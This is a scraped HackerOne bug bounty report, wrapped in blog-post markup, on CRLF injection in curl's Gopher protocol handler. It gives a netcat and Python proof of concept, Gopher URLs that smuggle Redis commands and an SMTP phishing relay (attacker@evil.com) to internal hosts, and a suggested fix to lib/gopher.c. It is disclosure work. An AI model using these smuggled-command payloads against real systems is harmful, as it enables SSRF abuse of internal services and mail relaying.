{“lastseen”:”2026-01-14T10:28:08″,”description”:”## Summary\\nThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to \\”smuggle\\” additional Gopher selectors or arbitrary commands into a single Gopher request. By using `%0d%0a` in the URL, an attacker can break the line-delimited Gopher protocol and force `curl` to send multiple distinct request lines to the server.\\n\\n## Affected Component\\n- **File:** `lib\/gopher.c`\\n- **Function:** `gopher_do`\\n- **Line:** 101\\n- **Vulnerable Code:** `Curl_urldecode` call with `REJECT_ZERO` flag\\n\\n## Vulnerability Details\\n\\n### Root Cause\\nIn `lib\/gopher.c`, the Gopher protocol handler extracts the selector from the URL and decodes it using `Curl_urldecode` with the `REJECT_ZERO` flag:\\n\\n“`c\\n\/* lib\/gopher.c:101 *\/\\nresult = Curl_urldecode(newp, 0, \\u0026buf_alloc, \\u0026buf_len, REJECT_ZERO);\\n“`\\n\\nThe `REJECT_ZERO` flag only prevents null bytes (`%00`) from being decoded. All other control characters, including:\\n- Carriage Return (`%0d` \/ `\\\\r`)\\n- Line Feed (`%0a` \/ `\\\\n`)\\n\\nare decoded into the raw buffer `buf_alloc` and subsequently sent to the server.\\n\\n### Attack Mechanism\\nThe Gopher protocol is line-delimited. After decoding the selector, `curl` sends it to the server followed by a hardcoded CRLF:\\n\\n“`c\\n\/* lib\/gopher.c:110 *\/\\nresult = Curl_xfer_send(data, buf, buf_len, FALSE, \\u0026nwritten);\\n…\\n\/* lib\/gopher.c:156 *\/\\nresult = Curl_xfer_send(data, \\”\\\\r\\\\n\\”, 2, FALSE, \\u0026nwritten);\\n“`\\n\\nIf an attacker provides a URL like:\\n“`\\ngopher:\/\/example.com\/1\/selector%0d%0aINJECTED_COMMAND\\n“`\\n\\nThe resulting network transmission will be:\\n“`\\nselector\\\\r\\\\n\\nINJECTED_COMMAND\\\\r\\\\n\\n“`\\n\\nA standard Gopher server processes each line independently, so it will see:\\n1. A request for `selector`\\n2. A second, attacker-controlled request for `INJECTED_COMMAND`\\n\\n## Proof of Concept\\n\\n### Step 1: Start a Listener\\nOpen a terminal and start a netcat listener to observe the raw protocol traffic:\\n\\n“`bash\\nnc -l -p 7070\\n“`\\n\\n### Step 2: Execute the Attack\\nIn another terminal, run curl with the malicious Gopher URL:\\n\\n“`bash\\ncurl -v \\”gopher:\/\/localhost:7070\/1\/first-command%0d%0asecond-command\\”\\n“`\\n\\n### Step 3: Observe the Result\\nIn the netcat listener terminal, you will see two distinct lines:\\n\\n“`\\nfirst-command\\nsecond-command\\n“`\\n\\nThis proves that the attacker can inject arbitrary commands into the Gopher protocol stream.\\n\\n### Alternative PoC (Python)\\nYou can also use this Python script to verify:\\n\\n“`python\\nimport socket\\n\\n# Start a simple Gopher server\\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\ns.bind((‘127.0.0.1’, 7070))\\ns.listen(1)\\nprint(\\”Gopher server listening on port 7070…\\”)\\n\\nconn, addr = s.accept()\\ndata = conn.recv(1024).decode()\\nprint(\\”=== Received Data ===\\”)\\nprint(repr(data))\\nprint(\\”\\\\n=== Parsed Lines ===\\”)\\nfor line in data.split(‘\\\\r\\\\n’):\\n if line:\\n print(f\\”Command: {line}\\”)\\nconn.close()\\ns.close()\\n“`\\n\\nRun this script, then execute:\\n“`bash\\ncurl \\”gopher:\/\/localhost:7070\/1\/legitimate%0d%0ainjected%0d%0amalicious\\”\\n“`\\n\\nExpected output:\\n“`\\n=== Received Data ===\\n’legitimate\\\\r\\\\ninjected\\\\r\\\\nmalicious\\\\r\\\\n’\\n\\n=== Parsed Lines ===\\nCommand: legitimate\\nCommand: injected\\nCommand: malicious\\n“`\\n\\n## Impact\\n\\n### SSRF Enhancement\\nThis vulnerability significantly enhances Server-Side Request Forgery (SSRF) attacks. If a web application allows users to provide a URL that is fetched by `curl`, an attacker can:\\n\\n1. **Smuggle commands to internal Gopher servers**\\n – Send multiple queries in a single request\\n – Bypass rate limiting or logging mechanisms\\n\\n2. **Communicate with other line-delimited internal services**\\n – Redis (if accessible via Gopher port or through port confusion)\\n – SMTP servers\\n – Memcached\\n – Custom internal protocols\\n\\n3. **Bypass security controls**\\n – WAFs that only inspect the URL path\\n – Logging systems that record only the initial request\\n\\n### Attack Scenarios\\n\\n**Scenario 1: Redis Command Injection**\\n“`\\ngopher:\/\/internal-redis:6379\/1\/SET%20key%20value%0d%0aGET%20sensitive_data\\n“`\\n\\n**Scenario 2: SMTP Relay**\\n“`\\ngopher:\/\/mail-server:25\/1\/MAIL%20FROM:\\u003cattacker@evil.com\\u003e%0d%0aRCPT%20TO:\\u003cvictim@target.com\\u003e%0d%0aDATA%0d%0aSubject:%20Phishing\\n“`\\n\\n## Recommendation\\n\\n### Fix\\nUpdate `lib\/gopher.c` to use `REJECT_CTRL` or `REJECT_CTRL_ZERO` instead of `REJECT_ZERO` in the `Curl_urldecode` call:\\n\\n“`c\\n\/* lib\/gopher.c:101 – FIXED *\/\\nresult = Curl_urldecode(newp, 0, \\u0026buf_alloc, \\u0026buf_len, REJECT_CTRL);\\n“`\\n\\nThis will prevent the decoding of newlines and other control characters that can be used to manipulate the protocol stream.\\n\\n### Verification\\nAfter applying the fix, the PoC should fail with an error indicating that control characters are not allowed in the URL.”,”published”:”2026-01-13T13:16:23″,”modified”:”2026-01-14T09:32:16″,”type”:”hackerone”,”title”:”curl: Gopher Protocol Command Injection (SSRF Smuggling)”,”source”:””,”references”:””,”id”:”H1:3508785″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3508785″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-14T10:28:08″,”description”:”## Summary\\nThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to \\”smuggle\\” additional…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35641","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n